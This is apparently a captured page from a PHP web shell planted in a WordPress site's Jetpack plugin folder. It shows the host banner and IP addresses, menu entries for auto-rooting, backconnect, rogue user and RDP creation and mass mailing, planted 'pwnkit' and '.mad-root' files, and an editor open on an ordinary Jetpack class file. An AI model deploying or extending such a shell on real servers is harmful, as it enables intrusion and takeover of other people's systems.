Linux webm014.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.130.20.14 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.4.33
hsesolc
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
hsesolc /
www /
wp-content /
plugins /
jetpack /
[ HOME SHELL ]
Name
Size
Permission
Action
3rd-party
[ DIR ]
drwxr-xr-x
_inc
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
extensions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
jetpack_vendor
[ DIR ]
drwxr-xr-x
json-endpoints
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
sal
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
CHANGELOG.md
422.56
KB
-rw-r--r--
LICENSE.txt
17.98
KB
-rw-r--r--
SECURITY.md
2.33
KB
-rw-r--r--
class-jetpack-connection-statu...
729
B
-rw-r--r--
class-jetpack-gallery-settings...
3.25
KB
-rw-r--r--
class-jetpack-pre-connection-j...
5.77
KB
-rw-r--r--
class-jetpack-recommendations-...
9.08
KB
-rw-r--r--
class-jetpack-stats-dashboard-...
5.23
KB
-rw-r--r--
class-jetpack-wizard-banner.ph...
214
B
-rw-r--r--
class-jetpack-xmlrpc-methods.p...
8.27
KB
-rw-r--r--
class.frame-nonce-preview.php
3.22
KB
-rw-r--r--
class.jetpack-admin.php
19.82
KB
-rw-r--r--
class.jetpack-affiliate.php
141
B
-rw-r--r--
class.jetpack-autoupdate.php
9.64
KB
-rw-r--r--
class.jetpack-bbpress-json-api...
156
B
-rw-r--r--
class.jetpack-cli.php
71.2
KB
-rw-r--r--
class.jetpack-client-server.ph...
2.79
KB
-rw-r--r--
class.jetpack-connection-banne...
19.35
KB
-rw-r--r--
class.jetpack-data.php
211
B
-rw-r--r--
class.jetpack-gutenberg.php
37.92
KB
-rw-r--r--
class.jetpack-heartbeat.php
4.56
KB
-rw-r--r--
class.jetpack-idc.php
351
B
-rw-r--r--
class.jetpack-modules-list-tab...
14.51
KB
-rw-r--r--
class.jetpack-network-sites-li...
5.9
KB
-rw-r--r--
class.jetpack-network.php
21.31
KB
-rw-r--r--
class.jetpack-plan.php
8.93
KB
-rw-r--r--
class.jetpack-post-images.php
29.29
KB
-rw-r--r--
class.jetpack-twitter-cards.ph...
13.06
KB
-rw-r--r--
class.jetpack-user-agent.php
31.01
KB
-rw-r--r--
class.jetpack.php
226.67
KB
-rw-r--r--
class.json-api-endpoints.php
80.07
KB
-rw-r--r--
class.json-api.php
33.39
KB
-rw-r--r--
class.photon.php
48.63
KB
-rw-r--r--
composer.json
3.62
KB
-rw-r--r--
enhanced-open-graph.php
4.45
KB
-rw-r--r--
functions.compat.php
4.66
KB
-rw-r--r--
functions.cookies.php
1.98
KB
-rw-r--r--
functions.global.php
13.91
KB
-rw-r--r--
functions.opengraph.php
17.6
KB
-rw-r--r--
functions.photon.php
10.26
KB
-rw-r--r--
jetpack.php
7.99
KB
-rw-r--r--
json-api-config.php
330
B
-rw-r--r--
json-endpoints.php
6.7
KB
-rw-r--r--
load-jetpack.php
4.03
KB
-rw-r--r--
locales.php
324
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
24.4
KB
-rw-r--r--
require-lib.php
1.3
KB
-rw-r--r--
uninstall.php
1.29
KB
-rw-r--r--
wpml-config.xml
1.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-jetpack-pre-connection-jitms.php
<?php /** * Jetpack's Pre-Connection JITMs class. * * @package jetpack */ use Automattic\Jetpack\Partner_Coupon as Jetpack_Partner_Coupon; use Automattic\Jetpack\Redirect; /** * Jetpack's Pre-Connection JITMs. These can be displayed with the JITM package. */ class Jetpack_Pre_Connection_JITMs { /** * Returns all the pre-connection messages. * * @return array An array containing the pre-connection JITM messages. */ private function get_raw_messages() { $button_caption = __( 'Set up Jetpack', 'jetpack' ); /* Translators: placeholders are links. */ $media_description = __( 'Click on the <strong>Set up Jetpack</strong> button to agree to our <a href="%1$s" target="_blank" rel="noopener noreferrer">Terms of Service</a> and to <a href="%2$s" target="_blank" rel="noopener noreferrer">share details</a> with WordPress.com, and gain access to Site Accelerator.', 'jetpack' ); /* Translators: placeholders are links. */ $widgets_description = __( 'Click on the <strong>Set up Jetpack</strong> button to agree to our <a href="%1$s" target="_blank" rel="noopener noreferrer">Terms of Service</a> and to <a href="%2$s" target="_blank" rel="noopener noreferrer">share details</a> with WordPress.com, and gain access to great additional widgets.', 'jetpack' ); /* Translators: placeholders are links. */ $posts_description = __( 'Click on the <strong>Set up Jetpack</strong> button to agree to our <a href="%1$s" target="_blank" rel="noopener noreferrer">Terms of Service</a> and to <a href="%2$s" target="_blank" rel="noopener noreferrer">share details</a> with WordPress.com, and gain access to in-depth stats about your site.', 'jetpack' ); $messages = array( array( 'id' => 'jpsetup-upload', 'message_path' => '/wp:upload:admin_notices/', 'message' => __( 'Do you want lightning-fast images?', 'jetpack' ), 'description' => $this->generate_description_with_tos( $media_description ), 'button_caption' => $button_caption, ), array( 'id' => 'jpsetup-widgets', 'message_path' => '/wp:widgets:admin_notices/', 'message' => __( 'Looking for even more widgets?', 'jetpack' ), 'description' => $this->generate_description_with_tos( $widgets_description ), 'button_caption' => $button_caption, ), ); if ( wp_count_posts()->publish >= 5 ) { $messages[] = array( 'id' => 'jpsetup-posts', 'message_path' => '/wp:edit-post:admin_notices/', 'message' => __( 'Do you know which of these posts gets the most traffic?', 'jetpack' ), 'description' => $this->generate_description_with_tos( $posts_description ), 'button_caption' => $button_caption, ); } foreach ( $messages as $key => $message ) { /* * Add Connect URL to each message, with from including jitm id. */ $jetpack_setup_url = $this->generate_admin_url( array( 'page' => 'jetpack#/setup', 'from' => sprintf( 'pre-connection-jitm-%s', $message['id'] ), ) ); $messages[ $key ]['button_link'] = $jetpack_setup_url; } return $messages; } /** * Generate a description text with links to ToS documents. * * Those messages must mention the ToS agreement message, * but do not use the standard message defined in jetpack_render_tos_blurb. * Instead, they use their own custom messages. * * @param string $description Description string with placeholders. * * @return string */ private function generate_description_with_tos( $description ) { return sprintf( wp_kses( $description, array( 'a' => array( 'href' => array(), 'target' => array(), 'rel' => array(), ), 'strong' => true, ) ), esc_url( Redirect::get_url( 'wpcom-tos' ) ), esc_url( Redirect::get_url( 'jetpack-support-what-data-does-jetpack-sync' ) ) ); } /** * Returns partnership related pre-connection messages. * * @since 10.4 * * @return array An array containing the pre-connection JITM messages. */ private function maybe_get_raw_partnership_messages() { $partner_coupon = Jetpack_Partner_Coupon::get_coupon(); if ( ! $partner_coupon ) { return array(); } return array( array( 'id' => 'jpsetup-partner-coupon', 'message_path' => '/wp:(plugin-install|themes|update-core|upload|users|tools|options-general):admin_notices/', /* Translators: 1: Product name, 2: Partner name. */ 'message' => sprintf( esc_html__( 'Get %1$s with your %2$s account', 'jetpack' ), $partner_coupon['product']['title'], $partner_coupon['partner']['name'] ), 'description' => $partner_coupon['product']['description'], 'button_caption' => esc_html__( 'Redeem coupon', 'jetpack' ), 'button_link' => $this->generate_admin_url( array( 'page' => 'jetpack#/dashboard', 'from' => 'pre-connection-jitm--jpsetup-partner-coupon', ) ), ), ); } /** * Adds the input query arguments to the admin url. * * @param array $args The query arguments. * * @return string The admin url. */ private function generate_admin_url( $args ) { $url = add_query_arg( $args, admin_url( 'admin.php' ) ); return $url; } /** * Add the Jetpack pre-connection JITMs to the list of pre-connection JITM messages. * * @param array $pre_connection_messages An array of pre-connection JITMs. * * @return array The array of pre-connection JITMs. */ public function add_pre_connection_jitms( $pre_connection_messages ) { $jetpack_messages = array_merge( $this->get_raw_messages(), $this->maybe_get_raw_partnership_messages() ); if ( ! is_array( $pre_connection_messages ) ) { // The incoming messages aren't an array, so just return Jetpack's messages. return $jetpack_messages; } return array_merge( $pre_connection_messages, $jetpack_messages ); } }
Close